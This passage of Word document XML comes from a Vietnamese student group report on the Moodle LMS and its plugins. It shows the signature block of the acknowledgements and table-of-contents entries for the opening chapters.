      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc182409057"/>
      <w:r w:rsidRPr="008425EB">
        <w:lastRenderedPageBreak/>
        <w:t>LỜI CÁM ƠN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3B15D8BE" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21489010" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544AAE42" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7589EB1D" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F605F2" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553587C2" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A5F73F" w14:textId="6C09E7EC" w:rsidR="00635D1E" w:rsidRPr="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00635D1E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5040" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hà Nội, ngày 28 tháng 10 năm 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570AD03A" w14:textId="57F8A217" w:rsidR="00635D1E" w:rsidRPr="00393924" w:rsidRDefault="00635D1E" w:rsidP="00635D1E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00393924" w:rsidRPr="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00393924">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00393924" w:rsidRPr="00393924">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ĐẠI DIỆN NHÓM </w:t>
      </w:r>
      <w:r w:rsidRPr="00393924">
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SINH VIÊN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC6EF0" w14:textId="3B7933CD" w:rsidR="00D43DF5" w:rsidRDefault="00635D1E" w:rsidP="00635D1E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5760" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nguyễn Giang Nam</w:t>
        <w:br/>
        <w:t>(Đại diện nhóm sinh viên)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75271FD2" w14:textId="77777777" w:rsidR="00E10AD7" w:rsidRPr="00AE47E8" w:rsidRDefault="00E10AD7" w:rsidP="00E10AD7">
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc182409058"/>
      <w:r w:rsidRPr="00AE47E8">
        <w:lastRenderedPageBreak/>
        <w:t>MỤC LỤC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0CF1423A" w14:textId="0D27D307" w:rsidR="00354E72" w:rsidRDefault="00C17AAF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \u \t "CTDT-H1,1,CTDT-H2,2,CTDT-H3,3,CTDT-H0,1,CTDT-H3.1,3,CTDT-H3.0,3" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc182409056" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>LỜI CAM ĐOAN</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409056 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>ii</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E86618C" w14:textId="4D27A0E2" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409057" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>LỜI CÁM ƠN</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409057 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>iii</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2458ED5C" w14:textId="2372A2A5" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409058" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MỤC LỤC</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409058 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>iv</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0296B06D" w14:textId="7294C2F9" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409059" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>DANH MỤC CÁC HÌNH VẼ</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409059 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>v</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69FAFC71" w14:textId="1D81B546" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409060" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>DANH MỤC CÁC BẢNG BIỂU</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409060 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>v</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CB379C1" w14:textId="2CD7D814" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409061" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>DANH MỤC CÁC TỪ VIẾT TẮT</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409061 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>vi</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C52D7DF" w14:textId="2E3A662F" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409062" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MỞ ĐẦU</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409062 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41308265" w14:textId="361E5A91" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409063" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
            <w:noProof/>
          </w:rPr>
          <w:t>CHƯƠNG 1.</w:t>
        </w:r>
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> TỔNG QUAN VỀ HỆ THỐNG MOODLE LMS</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409063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7D07243F" w14:textId="71F1F879" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409064" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.1 Giới thiệu</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409064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160670A3" w14:textId="2B9F0A42" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409065" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.2 Kiến trúc và tính năng của Moodle LMS</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409065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101BD87D" w14:textId="0F33038D" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409066" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.2.1</w:t>
        </w:r>
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Kiến trúc và các thành phần của Moodle LMS</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409066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174CDA87" w14:textId="5EBB73CF" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409067" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.3 Kết chương</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409067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7A681979" w14:textId="6A2270F2" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409068" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
            <w:noProof/>
          </w:rPr>
          <w:t>CHƯƠNG 2.</w:t>
        </w:r>
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> THIẾT KẾ VÀ CÀI ĐẶT CÁC PLUGIN CHO MOODLE LMS</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409068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06A62C26" w14:textId="3FE462EB" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
